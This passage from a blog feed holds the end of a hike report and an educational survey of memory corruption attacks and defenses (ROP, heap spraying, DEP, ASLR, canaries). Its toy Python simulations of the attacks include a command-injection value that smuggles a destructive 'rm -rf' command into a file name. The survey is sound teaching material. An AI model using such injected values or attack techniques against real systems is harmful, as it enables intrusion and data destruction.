&lt;p&gt;The super high hill is a whopping 260m high.&lt;/p&gt;
&lt;p&gt;The hike was fairly easy and we found plenty of time to indulge in the
view and to find a couple of GeoCaches on the way.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130323-Angel_Island.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;All in all it was a very relaxing day and we enjoyed our special day on
this beautiful island. The island is great for families too as there are
many BBQ places and play grounds. Go there for the amazing views and the
laid back atmosphere. There are not too many trails and they might be
crowded, especially in summer.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="day hike"></category><category term="GeoCache"></category><category term="beach"></category><category term="view"></category></entry><entry><title>WarGames in memory: shall we play a game?</title><link href="/blog/2013/0312-wargames-in-memory-shall-we-play-a-game.html" rel="alternate"></link><published>2013-03-12T05:53:00-04:00</published><updated>2013-03-12T05:53:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-03-12:/blog/2013/0312-wargames-in-memory-shall-we-play-a-game.html</id><summary type="html">&lt;p&gt;Memory corruption (e.g., buffer overflows, random writes, memory
allocation bugs, or uncontrolled format strings) is one of the oldest
and most exploited problems in computer science. Low-level languages
like C or C++ trade memory safety and type safety for performance: the
compiler adds no bound checks and no type …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Memory corruption (e.g., buffer overflows, random writes, memory
allocation bugs, or uncontrolled format strings) is one of the oldest
and most exploited problems in computer science. Low-level languages
like C or C++ trade memory safety and type safety for performance: the
compiler adds no bound checks and no type checks. The programmer alone
is responsible for memory management and type casting, which can lead to
serious exploitable bugs. Prerequisites for a successful memory
corruption are (i) that a pointer is pushed out of bounds (e.g., by
iterating over the end of a buffer) or that a pointer becomes dangling
(e.g., by freeing the object that a pointer points to) and (ii) that the
attacker controls the value written to the out-of-bounds pointer, e.g.,
directly through an assignment or indirectly through some management
function.&lt;/p&gt;
&lt;p&gt;According to academia &amp;quot;&lt;em&gt;buffer overflows are a solved problem&lt;/em&gt;&amp;quot; (quote
paraphrased according to a member of the panel discussion about system
security at&amp;nbsp;INFOCOM'99 in New York). This answer is partially true as
there are safe languages that provide memory safety and type safety,
such as Java or C#. These languages achieve memory safety by using
automatic memory allocation and de-allocation (garbage collection) and
adding bound checks to all buffers and structures. In addition, they add
a strict type system that disallows casting between mutually exclusive
types (e.g., from one struct to another completely disjoint struct).&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0312/cve_mem_corruption.jpg"&gt;&lt;img alt="image0" src="/blog/static/2013/0312/cve_mem_corruption.jpg" style="width: 600px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Figure 1: development of different classes of memory corruption attacks;
based on &lt;a class="reference external" href="http://cve.mitre.org/"&gt;CVE&lt;/a&gt; data.&lt;/p&gt;
&lt;p&gt;On the other hand, if we look at the development of memory corruption
attacks since 1999 (Figure 1) we see that the number of these attacks
rose until 2007 and is at an all-time high. So we can ask ourselves:
what went wrong? For one, there are new attack vectors (e.g.,
code-reuse attacks like &lt;a class="reference external" href="http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html"&gt;Return Oriented Programming&lt;/a&gt; [39]); in addition, safe
languages have (i) too much overhead, (ii) too much latency (languages
like Java do not support realtime execution because of stop-the-world
garbage collection), (iii) missing support for legacy code, (iv)
increased complexity, and (v) missing features like direct memory access
for low-level applications.&lt;/p&gt;
&lt;p&gt;The goal of this post is to explain different forms of memory corruption
attacks and possible defenses that are deployed for current software
systems. We will see that attack vectors and defense mechanisms are
closely related and, through this relation, evolve alongside each other. This
article extends existing surveys and summaries [20, 36] by (i) a
study that looks at the symbiosis between attacks and defenses and (ii)
an analysis that explains why certain defense mechanisms are used in
practice while other mechanisms never see wide adoption.&lt;/p&gt;
&lt;div class="section" id="attack-model"&gt;
&lt;h2&gt;Attack model&lt;/h2&gt;
&lt;p&gt;An attacker with restricted privileges forces escalation, e.g., a remote
user escalates to a local user account or a local user escalates to a
privileged account. Our attack model assumes a white-box approach: the
attacker knows both the source code and the binary of the application
(so the attacker can execute binary analysis, evaluate the offsets of
structs, and recover partial runtime information). A successful attack
redirects the control flow to an alternate location and either injected
code is executed or alternate data is used during the execution of
existing code.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="evolution-of-attack-vectors-and-defenses"&gt;
&lt;h2&gt;Evolution of attack vectors and defenses&lt;/h2&gt;
&lt;div class="section" id="memory-corruption-attacks"&gt;
&lt;h3&gt;Memory corruption attacks&lt;/h3&gt;
&lt;p&gt;A memory corruption attack relies on two properties: (i) a live pointer
points to illegal data and (ii) said pointer is read or written by the
application. An attacker can force the pointer out of bounds directly,
by exploiting a buffer overflow or underflow that writes across the
bounds of a buffer, or indirectly, by manipulating the object that the
pointer points to: if this object is freed or recycled then the pointer
is left dangling and points to illegal data.&lt;/p&gt;
&lt;p&gt;In practice, an attacker realizes these two properties in three steps:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;strong&gt;Preparation&lt;/strong&gt;: first the pointer is redirected to an illegal memory
location through a &lt;em&gt;spatial&lt;/em&gt; bug (the pointer is forced out of
bounds) or a &lt;em&gt;temporal&lt;/em&gt; bug (making the pointer dangling). Possible
attack vectors for the first step are &lt;em&gt;buffer overflows/underflows on
the stack or on the heap, integer overflows and underflows, format
string exploits, double free, and other memory corruption&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Setup&lt;/strong&gt;: the attacker uses regular control flow of the application
to dereference and write to the pointer. This second step exploits
the spatial or temporal memory bug to disable &lt;em&gt;code pointer
integrity&lt;/em&gt; (all function pointers in the application point to correct
and valid code locations), &lt;em&gt;code integrity&lt;/em&gt; (the executable code of
the application is unchanged), &lt;em&gt;control-flow integrity&lt;/em&gt; (the
control-flow of the application follows the original
programmer-intended pattern), &lt;em&gt;data integrity&lt;/em&gt; (the data of the
application is only changed by valid computation), or &lt;em&gt;data-flow
integrity&lt;/em&gt; (the data-flow in the application follows the intended
pattern). A correct execution of an application relies on all of the
aforementioned concepts being enforced at all times. At this point
the attacker has control over some data structures and possible
targets are &lt;em&gt;overwriting the return instruction pointer&lt;/em&gt; (RIP) on the
stack, &lt;em&gt;overwriting a function pointer&lt;/em&gt; (in the vtable, GOT, or in
the .dtor section), &lt;em&gt;forcing an exception&lt;/em&gt; (e.g., a NULL pointer
dereference), or &lt;em&gt;overwriting heap management data structures&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Execution&lt;/strong&gt;: finally the control flow is redirected to a location
that is controlled by the attacker. The attacker uses either &lt;em&gt;code
corruption&lt;/em&gt; (new executable code is injected and/or existing code is
changed and control-flow is redirected to the injected code),
&lt;em&gt;code-reuse attack&lt;/em&gt; (existing code is reused in an unintended way), a
&lt;em&gt;data-only attack&lt;/em&gt; (only the data of the application is changed to
adapt the outcome of some computation), or &lt;em&gt;information leakage&lt;/em&gt;
(internal state is leaked to the attacker) to execute the malicious
behavior.&lt;/li&gt;
&lt;/ol&gt;
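&lt;p&gt;The preparation step can be illustrated with a small simulation. This is a
sketch only: the frame layout, the offsets, and the addresses below are made
up, and a real exploit corrupts the machine stack, not a Python bytearray:&lt;/p&gt;

```python
import struct

# Simulated stack frame: an 8-byte buffer directly below a saved return
# address (layout and values are illustrative, not a real stack).
FRAME = bytearray(16)
struct.pack_into("=Q", FRAME, 8, 0x400000)  # benign "return address"

def unchecked_copy(frame, data):
    # spatial bug: blindly copies len(data) bytes into an 8-byte buffer
    frame[0:len(data)] = data

# attacker input: 8 filler bytes plus a replacement return address
payload = b"A" * 8 + struct.pack("=Q", 0x1337)
unchecked_copy(FRAME, payload)

corrupted = struct.unpack_from("=Q", FRAME, 8)[0]
print(hex(corrupted))  # prints 0x1337: the return address is attacker-controlled
```

&lt;p&gt;Steps two and three of a real attack would then let the program return
through this corrupted value.&lt;/p&gt;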
&lt;/div&gt;
&lt;div class="section" id="commonly-used-attack-techniques"&gt;
&lt;h3&gt;Commonly used attack techniques&lt;/h3&gt;
&lt;p&gt;To execute malicious code an attacker usually uses one of three
techniques: code injection, code reuse, or command injection. Each
technique has its advantages and disadvantages and we will discuss them
in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code injection&lt;/strong&gt; is the oldest technique that achieves code execution.
This technique attacks &lt;em&gt;code integrity&lt;/em&gt; and injects executable code into
data regions. Depending on flags in the page table any data on a memory
page may be interpreted as machine code and executed. Prerequisites for
this attack are (i) an executable memory area and a known address of a
buffer to redirect control to, (ii) partial control of the contents of
the buffer in the executable memory area, and (iii) a redirectable
control flow to that partially controlled area of the buffer. This
technique is no longer viable on modern systems due to hardware
support for non-executable memory pages (post 2006).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code reuse&lt;/strong&gt; is considered the response to the increased hardware
protection against code injection. This technique circumvents
control-flow integrity and/or code pointer integrity and reuses existing
executable code with alternate data. So called gadgets (short sequences
of instructions that usually pop/push registers and execute some
computation followed by an indirect control flow transfer) are used to
execute a set of prepared invocation frames. Prerequisites for this
attack are (i) known addresses of necessary gadgets, (ii) a partially
attacker-controlled buffer, and (iii) a redirectable control-flow
transfer to the gadget that uses the first invocation frame. Protecting
against this technique at a low level is very hard: enforcing
control-flow integrity requires checking the validity of every indirect
control-flow transfer.&lt;/p&gt;
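&lt;p&gt;A toy model can show how prepared invocation frames drive a computation
through existing code. The gadget names and operations below are invented;
real gadgets are machine-code snippets found in the victim binary:&lt;/p&gt;

```python
# Toy model of a code-reuse chain. Each "gadget" stands for a short
# instruction sequence ending in a return; the attacker-prepared payload
# is just an ordered list of gadget addresses.
def gadget_load5(state):   # e.g. a "pop; ret" sequence loading a constant
    state["reg"] = 5

def gadget_add3(state):    # e.g. an "add; ret" sequence
    state["reg"] += 3

def gadget_double(state):  # e.g. a "shift-left; ret" sequence
    state["reg"] *= 2

def run_chain(chain):
    # models the CPU consuming one prepared invocation frame per gadget
    state = {"reg": 0}
    for gadget in chain:
        gadget(state)
    return state["reg"]

# existing code only, yet the attacker computes (5 + 3) * 2
result = run_chain([gadget_load5, gadget_add3, gadget_double])
print(result)  # prints 16
```

&lt;p&gt;No new code is injected: the "program" executed by the attacker is encoded
entirely in the order of the frames.&lt;/p&gt;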
&lt;p&gt;&lt;strong&gt;Command injection&lt;/strong&gt; is a third technique that prepares data that is
passed to another application or to the kernel (e.g., SQL injection).
The technique relies on the fact that unsanitized, attacker-controlled
data is forwarded, which leads to unexpected behavior. This technique attacks
data integrity and/or data-flow integrity of the application.
Prerequisite for this attack is only a missing or faulty sanity check.
It is hard to protect against this attack because the source application
needs to know about the kind of data the target expects and the context
in which the target expects the data.&lt;/p&gt;
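&lt;p&gt;A minimal sketch of the missing sanity check (the command and file names
are hypothetical; the unsafe string is built but never executed here):&lt;/p&gt;

```python
import shlex

def build_command(filename):
    # vulnerable: attacker-controlled data is concatenated unsanitized
    return "cat " + filename

def build_command_safe(filename):
    # sanitized: quoting keeps the input a single shell argument
    return "cat " + shlex.quote(filename)

benign = build_command("notes.txt")
evil = build_command("notes.txt; rm -rf /tmp/victim")  # smuggles a 2nd command
safe = build_command_safe("notes.txt; rm -rf /tmp/victim")

print(benign)  # cat notes.txt
print(evil)    # cat notes.txt; rm -rf /tmp/victim
print(safe)    # cat 'notes.txt; rm -rf /tmp/victim'
```

&lt;p&gt;The vulnerable variant forwards the semicolon to the shell unchanged; the
target (the shell) interprets it in a context the source never considered.&lt;/p&gt;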
&lt;/div&gt;
&lt;div class="section" id="defenses-and-their-limitations"&gt;
&lt;h3&gt;Defenses and their limitations&lt;/h3&gt;
&lt;p&gt;A multitude of different defenses have been proposed and discussed but
only three defenses are actually used in practice: Data Execution
Prevention (DEP), Address Space Layout Randomization (ASLR), and
Canaries. None of the defenses is complete and each defense has
particular weaknesses and limitations. In combination they offer
complete protection against code injection attacks and partial
protection against code reuse attacks. In general, it can be said that the
available defenses merely raise the bar against specific attacks but do
not solve the problem of potential memory corruption.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data Execution Prevention (DEP)&lt;/strong&gt; protects applications (and kernels)
against code injection attacks. Newer processors add an additional flag (an
eXecutable bit) to every entry in the page table. Each page has three
bits: Readable (page is readable if set), Writable (page is writable if
set), and eXecutable (page contains code that will be executed if
control flow branches to this location). Before the eXecutable bit every
page was automatically executable and there was no separation between
code and data of an application. DEP is a technique that ensures that
any page is Writable xor eXecutable. This scheme protects against
code injection attacks by ensuring that no new code can be injected
after the application has started and all the code is loaded from disk.
A drawback of DEP is that dynamic code generation for, e.g.,
just-in-time compilation, is not supported. DEP only protects against
code injection attacks, all code reuse and other forms of attacks are
still possible.&lt;/p&gt;
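&lt;p&gt;The W^X policy can be captured in a toy page-permission model. This is a
sketch only: the page names and permission sets below are invented, and real
enforcement happens in the page-table hardware, not in software checks:&lt;/p&gt;

```python
# Toy page-table model of the W^X policy that DEP enforces: a page may be
# writable or executable, but never both.
def violates_wxorx(perms):
    return "w" in perms and "x" in perms

pages = {
    "code":  {"r", "x"},   # executable, immutable after loading
    "data":  {"r", "w"},   # writable, never executed
    "stack": {"r", "w"},
}
for name, perms in pages.items():
    assert not violates_wxorx(perms)

# a classic code-injection attempt needs a page that is writable AND
# executable; under DEP such a mapping is refused
injected = {"r", "w", "x"}
print(violates_wxorx(injected))  # prints True
```

&lt;p&gt;A JIT compiler needs exactly such a refused mapping, which is why DEP and
dynamic code generation are at odds.&lt;/p&gt;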
&lt;p&gt;&lt;strong&gt;Address Space Layout Randomization (ASLR)&lt;/strong&gt; is a probabilistic
protection that randomizes the locations of individual memory segments
(like code, heap, stack, data, memory mapped regions, or libraries).
ASLR is an extension of both the operating system (as memory management
system calls return random areas) and the loader that needs to load and
resolve code at random locations. Hand written exploits often use
absolute addressing and need to know the exact location of code they
want to branch to or data they want to reuse. Due to random code and
data locations these attacks are no longer successful. Unfortunately this
defense is prone to information leaks: if an attacker is able to extract
the locations of specific buffers without crashing the program, he/she
can use this knowledge for an exploit. ASLR basically turns a one-shot
attack (pwnage on first try) into a two-shot attack (information leak
first, pwnage second). A second drawback of ASLR is that some regions
remain static upon every run: on Linux, e.g., the main executable is
often not compiled as a position independent executable (PIE) and remains
static for every run (including GOT tables, data regions, and code
regions), so an attacker can use these static regions for a
Return Oriented Programming (ROP) attack or, more generally, a code-reuse
attack. An alternative to two-shot attacks is, e.g., heap spraying. Heap
spraying uses the limited number of randomizable bits for a 32-bit
memory image and fills the complete heap with copies of NOP slides and
the exploit. When the exploit executes the chances are good that the
exploit will hit one of the NOP slides and transfer control into the
exploit (that is replicated millions of times on the heap).&lt;/p&gt;
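&lt;p&gt;Why a blind jump into a sprayed heap succeeds can be seen in a small
simulation. The sizes and the number of copies are illustrative (0x90 is the
x86 NOP opcode); a real spray fills hundreds of megabytes:&lt;/p&gt;

```python
import random

# Toy model of a sprayed heap: many copies of [NOP slide | exploit].
NOP, EXPLOIT = 0x90, 0xCC
copy = bytes([NOP]) * 1023 + bytes([EXPLOIT])
heap = copy * 256                       # 256 sprayed copies

def execute_from(addr):
    # a NOP just advances "execution"; the first non-NOP byte "runs"
    while heap[addr] == NOP:
        addr += 1
    return heap[addr]

random.seed(2013)
landing = random.randrange(len(heap))   # the attacker's blind jump
print(hex(execute_from(landing)))       # prints 0xcc: the exploit runs
```

&lt;p&gt;Wherever the randomized jump lands inside the sprayed region, execution
slides down the NOPs into the exploit, so the limited ASLR entropy no longer
matters.&lt;/p&gt;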
&lt;p&gt;Comparing PIE with non-PIE executables (Figure 2) [33] using the SPEC
CPU2006 benchmarks shows that there is a performance difference of up to
25%. PIE executables reserve a register as a code pointer: due to the
randomized locations, indirect control flow transfer instructions
(indirect calls or indirect jumps) need a reference to know where to
transfer control to. The additional register usage increases register
pressure, which slows down overall execution. In reality few
programs are compiled as PIE [43].&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0312/overview.jpg"&gt;&lt;img alt="image1" src="/blog/static/2013/0312/overview.jpg" style="width: 600px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Figure 2: performance overhead for -fPIE on a 32-bit x86 system.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Canaries&lt;/strong&gt; are a probabilistic protection against buffer overflows.
The compiler places canary values (4 bytes on x86 or 8 bytes on x64)
adjacent to buffers on the stack or on the heap. After every buffer
modification the compiler adds an additional check to ensure that the
canary is still intact, e.g., the compiler will add a check after a loop
that copies values into a buffer. If the canary is replaced with some
other value then the check code terminates the application. Canaries
have several drawbacks: first, they only protect against continuous
writes (i.e., buffer overflows) and not against any other form of direct
overwrite. Second, they do not protect against data reads like
information leaks. And third, they are, like ASLR, prone to information
leaks. Only one random canary is generated for the execution of an
application.&lt;/p&gt;
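&lt;p&gt;The canary logic can be sketched as follows. This models what the compiler
conceptually inserts; the frame layout, sizes, and function names are
invented, and the real check operates on the machine stack frame:&lt;/p&gt;

```python
import secrets

# A per-execution random canary sits between the buffer and critical data.
CANARY = secrets.token_bytes(8)        # one random value per program run

def make_frame():
    # [ buffer (8 bytes) | canary (8 bytes) | saved data (8 bytes) ]
    return bytearray(8) + bytearray(CANARY) + bytearray(8)

def copy_and_check(frame, data):
    frame[0:len(data)] = data            # possibly overflowing write
    if bytes(frame[8:16]) != CANARY:     # check the compiler would insert
        raise RuntimeError("stack smashing detected")

copy_and_check(make_frame(), b"ok")      # in-bounds write passes the check
try:
    copy_and_check(make_frame(), b"A" * 20)  # overflow clobbers the canary
except RuntimeError as err:
    print(err)                           # prints: stack smashing detected
```

&lt;p&gt;Note that a targeted write directly into the "saved data" region would skip
the canary entirely, which is exactly the first drawback mentioned above.&lt;/p&gt;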
&lt;p&gt;&lt;strong&gt;Limitations of defenses&lt;/strong&gt;: DEP gives us code integrity and protects
against code injection, but not against any other form of attacks. DEP
relies on a hardware extension of the page table. Both canaries and ASLR
are probabilistic and prone to information leaks; a one-shot attack
merely becomes a two-shot attack. In addition, both canaries and ASLR are
not free and incur performance or data-layout costs.&lt;/p&gt;
&lt;p&gt;The status of current protection is very limited. Current systems have
complete protection of code integrity through DEP, which is
in widespread use. There is limited protection for code pointer
integrity and control-flow integrity through probabilistic protections
like PointGuard [16], canaries, and ASLR. So the code and control flow
of an application is (at least partially) protected. What is missing is
complete data protection: there is no data integrity or data-flow
integrity, although there are some proposals: WIT [4] uses a
points-to analysis to enforce data integrity, and DFI tracks
reaching definitions to enforce data-flow integrity.&lt;/p&gt;
&lt;p&gt;An interesting thing to note is that academia came up with many
protection mechanisms, but they were only used in practice once
exploits in the wild became too common and the attack
techniques became widely known. Stack-based ASLR and canaries were
introduced to protect against buffer overflows and code injection
attacks on the stack but were later extended to the heap and code regions
to protect against code reuse attacks as well. DEP is used as an absolute
protection against code injection attacks. This arms race between
attackers and defenders is interesting to watch, and a well-equipped
attacker has plenty of opportunities to bypass the defense mechanisms of
current systems. A second factor is that defense mechanisms always involve
a trade-off between the protection offered, legacy features that are no
longer supported, and the possible performance impact. New defenses are
therefore only introduced when the burden of the attacks becomes too high.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;p&gt;The following timeline shows how attacks and defenses developed
alongside:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
                              Attack  Year  Defense
               Smashing the stack [5] 1996
                      ret-2-libc [18] 1997
                                      1997 StackGuard [17]
        Heap overflow techniques [14] 1999
         Frame pointer overwrite [26] 1999
             Bypassing StackGuard and 2000
                     StackShield [11]
              Format string bugs [30] 2000
                                      2000 libsafe and libverify protect library
                                           functions [6]
                                      2001 ASLR [32]
                                      2001 ProPolice (stack canaries) are
                                           introduced [24]
                                      2001 FormatGuard [15]
    Heap exploits and SEH frames [22] 2002
                                      2002 Visual C++ 7 adds stack cookies
               Integer overflows [19] 2002
                                      2002 PaX adds W^X using segments and
                                           Kernel ASLR [32]
                                      2003 Visual Studio 2003: SAFESEH
                                      2004 Windows XP SP2: DEP for heap and stack
  ASLR only has 10bit randomness [40] 2004
                   Heap Spraying [41] 2004
                                      2005 Visual Studio 2005: stack cookies
                                           extended with shadow argument copies
                                      2006 PaX protects kernel against NULL
                                           dereferences
                                      2006 Ubuntu 6.06 adds stack and heap ASLR
         Advanced ret-2-libc [29, 36] 2007
          Double free vulnerabilities 2007
                                      2007 Ubuntu adds AppArmor [8]
                                      2007 Windows Vista implements full ASLR
                                           and heap hardening
                  ROP introduced [39] 2007
                                      2008 Ubuntu 8.04 adds pointer obfuscation
                                           for glibc and exec, brk, and
                                           VDSO ASLR [44]
                                      2008 Ubuntu 8.10 builds some apps with
                                           PIE, fortify source, relro [44]
                                      2009 Nozzle: heap spraying [38]
                                      2009 Ubuntu 9.04 implements BIND NOW and
                                           0-address protection [44]
                                      2009 Ubuntu 9.10 implements NX [44]
Memory management vulnerabilities [9] 2010
  New format string exploits [23, 37] 2010
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="failed-defenses"&gt;
&lt;h2&gt;Failed defenses&lt;/h2&gt;
&lt;p&gt;Many defense mechanisms have been researched and proposed but none of
them have seen widespread use except ASLR, DEP, and Canaries. The other
defenses failed for one of the following reasons: (i) too much
overhead, (ii) missing programming features, or (iii) no support for
legacy code.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Too much overhead&lt;/strong&gt;: as we see for ASLR (active for libraries,
disabled for executables) the overhead that is tolerated must be less
than 10% and must result in reasonable additional security guarantees.
Other proposals that result in higher overhead or lower guarantees did
not see widespread use beyond the papers in which they were published. ISA
randomization [25, 7, 42] implements code integrity by
randomizing the encoding of individual instructions but results in an
intolerable 2-3x overhead; PointGuard [16] protects function pointers
using an encoding; data-flow integrity tracks the data of an application
but results in 2-10x overhead; software-based fault isolation sandboxes
[27, 2, 3, 34, 46] implement code and code pointer
integrity by verifying all code before execution and result in 1.2x to
2x overhead. There are many other solutions in this category but we see
that each solution solves one specific problem at too high a price.&lt;/p&gt;
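&lt;p&gt;The idea behind PointGuard-style pointer protection is simple enough to
sketch. Key handling and the function names below are invented; the real
scheme encodes pointers in compiler-generated load/store sequences:&lt;/p&gt;

```python
import secrets

# Pointers stored in memory are XORed with a per-process secret key and
# decoded only when they are used.
KEY = secrets.randbits(64)

def encode(ptr):
    return ptr ^ KEY

def decode(stored):
    return stored ^ KEY

target = 0x7FFFDEADBEEF
assert decode(encode(target)) == target  # legitimate round trip

# an attacker overwriting the stored value without knowing KEY cannot
# choose where the decoded pointer will point
hijacked = decode(0x4141414141414141)
print(hijacked == 0x4141414141414141)    # False unless the attacker guessed KEY
```

&lt;p&gt;The encoding itself is cheap; the overhead comes from instrumenting every
pointer load and store, and an information leak of one encoded/decoded pair
reveals the key.&lt;/p&gt;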
&lt;p&gt;&lt;strong&gt;Missing programming features&lt;/strong&gt;: several proposed defense mechanisms
implement a security guarantee by removing specific flexibility in code,
data, or the original programming language. Many compiler-based security
guarantees like control-flow integrity [1, 21] or data space
randomization [4] rely on full program analysis where all code must
be compiled and analyzed at the same time. This requirement rules out
modularity (i.e., shared libraries) and requires that all code
is loaded statically. Other approaches like code diversity or
instruction-location randomization (ILR) make debugging applications harder.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No support for legacy code&lt;/strong&gt;: missing support for legacy code [28]
is another problem for many failed defense mechanisms. It is generally
not feasible to rewrite all libraries or applications to add new
security guarantees. A large legacy code base in an existing language
must still be supported with the new security features. It is OK to
change limited aspects in the runtime system (e.g., ASLR, DEP) or during
the compilation process (e.g., adding stack canaries in the data layout)
but it is hard to add completely new features (e.g., annotations,
rewriting the application in a new language).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Studying the existing defense mechanisms we see that three factors are
key for adoption: (i) pressing need through (new) attack vectors, (ii)
low overhead for the security solution, and (iii) compatibility with
legacy code and legacy features. Only if there is a clear migration
path will a new defense mechanism be adopted. The WarGames in
memory will continue as long as the security community plays the reactive
game. Probabilistic defense mechanisms only raise the bar; they do not
offer a complete solution. There is no reasonable defense mechanism that supports
complete program integrity by combining (i) code integrity, (ii) low
overhead control-flow integrity, and (iii) data-flow integrity. Until
such a solution exists the war in memory continues and the existing
exploit techniques will be used for fun and profit.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="references"&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;p&gt;[1] Abadi, M., Budiu, M., Erlingsson, U., and Ligatti, J. Control-flow
integrity. In CCS'05.&lt;/p&gt;
&lt;p&gt;[2] Acharya, A., and Raje, M. MAPbox: using parameterized behavior
classes to confine untrusted applications. In SSYM'00: Proc. 9th Conf.
USENIX Security Symp. (2000), pp. 1--17.&lt;/p&gt;
&lt;p&gt;[3] Aggarwal, A., and Jalote, P. Monitoring the security health of
software systems. In ISSRE'06: 17th Int'l Symp. Software Reliability
Engineering (nov. 2006), pp. 146 --158.&lt;/p&gt;
&lt;p&gt;[4] Akritidis, P., Cadar, C., Raiciu, C., Costa, M., and Castro, M.
Preventing memory error exploits with WIT. In SP'08: Proc. 2008 IEEE
Symposium on Security and Privacy (2008), pp. 263--277.&lt;/p&gt;
&lt;p&gt;[5] Aleph1. &lt;a class="reference external" href="http://phrack.com/issues.html?issue=49&amp;amp;id=14"&gt;Smashing the stack for fun and profit&lt;/a&gt;. Phrack 7, 49 (Nov.
1996).&lt;/p&gt;
&lt;p&gt;[6] Baratloo, A., Singh, N., and Tsai, T. Transparent run-time defense
against stack smashing attacks. In Proc. Usenix ATC (2000), pp.
251--262.&lt;/p&gt;
&lt;p&gt;[7] Barrantes, E. G., Ackley, D. H., Forrest, S., and Stefanović, D.
Randomized instruction set emulation. ACM Transactions on Information
System Security 8 (2005), 3--40.&lt;/p&gt;
&lt;p&gt;[8] Bauer, M. Paranoid penguin: an introduction to Novell AppArmor.
Linux J. 2006, 148 (2006), 13.&lt;/p&gt;
&lt;p&gt;[9] blackngel. &lt;a class="reference external" href="http://phrack.com/issues.html?issue=67&amp;amp;id=8"&gt;The house of lore: Reloaded&lt;/a&gt;. Phrack 14, 67 (Nov.
2010).&lt;/p&gt;
&lt;p&gt;[10] Bletsch, T., Jiang, X., Freeh, V. W., and Liang, Z. Jump-oriented
programming: a new class of code-reuse attack. In ASIACCS'11: Proc. 6th
ACM Symp. on Information, Computer and Communications Security (2011),
pp. 30--40.&lt;/p&gt;
&lt;p&gt;[11] Bulba, and Kil3r. &lt;a class="reference external" href="http://phrack.com/issues.html?issue=56&amp;amp;id=5"&gt;Bypassing stackguard and stackshield&lt;/a&gt;. Phrack
10, 56 (Nov. 2000).&lt;/p&gt;
&lt;p&gt;[12] Checkoway, S., Davi, L., Dmitrienko, A., Sadeghi, A.-R., Shacham,
H., and Winandy, M. Return-oriented programming without returns. In
CCS'10: Proceedings of CCS 2010 (2010), A. Keromytis and V. Shmatikov,
Eds., ACM Press, pp. 559--572.&lt;/p&gt;
&lt;p&gt;[13] Chen, P., Xing, X., Mao, B., Xie, L., Shen, X., and Yin, X.
Automatic construction of jump-oriented programming shellcode (on the
x86). In ASIACCS'11: Proc. 6th ACM Symp. on Information, Computer and
Communications Security (2011), ACM, pp. 20--29.&lt;/p&gt;
&lt;p&gt;[14] Conover, M. &lt;a class="reference external" href="http://www.cgsecurity.org/exploit/heaptut.txt"&gt;w00w00 on heap overflows&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;[15] Cowan, C., Barringer, M., Beattie, S., Kroah-Hartman, G., Frantzen,
M., and Lokier, J. Formatguard: automatic protection from printf format
string vulnerabilities. In SSYM'01: Proc. 10th USENIX Security Symp.
(2001).&lt;/p&gt;
&lt;p&gt;[16] Cowan, C., Beattie, S., Johansen, J., and Wagle, P. PointguardTM:
protecting pointers from buffer overflow vulnerabilities. In SSYM'03:
Proc. 12th USENIX Security Symp. (2003).&lt;/p&gt;
&lt;p&gt;[17] Cowan, C., Pu, C., Maier, D., Hintony, H., Walpole, J., Bakke, P.,
Beattie, S., Grier, A., Wagle, P., and Zhang, Q. StackGuard: automatic
adaptive detection and prevention of buffer-overflow attacks. In
SSYM'98: Proc. 7th USENIX Security Symp. (1998).&lt;/p&gt;
&lt;p&gt;[18] Designer, S. &lt;a class="reference external" href="http://insecure.org/sploits/linux.libc.return.lpr.sploit.html"&gt;Return into libc&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;[19] Dowd, M., Spencer, C., Metha, N., Herath, N., and Flake, H.
Professional source code auditing, 2002.&lt;/p&gt;
&lt;p&gt;[20] Erlingsson, U. Low-level software security: Attacks and defenses.
FOSAD'07: Foundations of security analysis and design (2007), 92--134.&lt;/p&gt;
&lt;p&gt;[21] Erlingsson, U., Abadi, M., Vrable, M., Budiu, M., and Necula, G. C.
XFI: Software guards for system address spaces. In OSDI'06.&lt;/p&gt;
&lt;p&gt;[22] Flake, H. &lt;a class="reference external" href="http://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt"&gt;Third generation exploitation&lt;/a&gt;, 2002.&lt;/p&gt;
&lt;p&gt;[23] Haas, P. &lt;a class="reference external" href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Haas%20/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf"&gt;Advanced format string attacks&lt;/a&gt;, DEFCON 18 2010.&lt;/p&gt;
&lt;p&gt;[24] Hiroaki, E., and Kunikazu, Y. ProPolice: Improved stack-smashing
